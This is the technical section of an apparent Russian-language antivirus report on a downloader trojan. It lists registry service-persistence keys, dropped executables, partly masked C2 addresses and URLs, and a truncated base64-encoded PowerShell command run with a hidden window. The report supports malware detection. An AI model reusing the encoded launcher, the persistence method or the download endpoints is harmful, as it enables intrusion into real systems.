Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\diantz] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\diantz] 'ImagePath' = '"%WINDIR%\SysWOW64\secproc_ssp\diantz.exe"'
- 'diantz' "%WINDIR%\SysWOW64\secproc_ssp\diantz.exe"
- 'diantz' %WINDIR%\SysWOW64\secproc_ssp\diantz.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGIAZABiAGQAdQA0AD0AKAAnAFYAcgB6ACcAKwAnAHMAdQBuAGcAJwApADsAJgAoACcAbgBlACcAKwAnAHcAJwArACcALQBpAHQAZQBtACcAKQAgACQARQBOAHYAOgB0AGUATQBwAFwAbwBmAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\vqio430.exe
- %WINDIR%\syswow64\secproc_ssp\diantz.exe
- %TEMP%\office2019\vqio430.exe в %WINDIR%\syswow64\secproc_ssp\diantz.exe
- '13#.#19.36.33':80
- '11#.#02.234.183':8080
- http://sa###ssion.org/sai/fU/
- http://11#.###.234.183:8080/FpcjN7zjbwPcGZrsQT/ANqwXiySi50ww5a6Sa/F6BWnggWm/ via 11#.#02.234.183
- DNS ASK sa###ssion.org
- '%TEMP%\office2019\vqio430.exe'
- '%WINDIR%\syswow64\secproc_ssp\diantz.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGIAZABiAGQAdQA0AD0AKAAnAFYAcgB6ACcAKwAnAHMAdQBuAGcAJwApADsAJgAoACcAbgBlACcAKwAnAHcAJwArACcALQBpAHQAZQBtACcAKQAgACQARQBOAHYAOgB0AGUATQBwAFwAbwBmAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)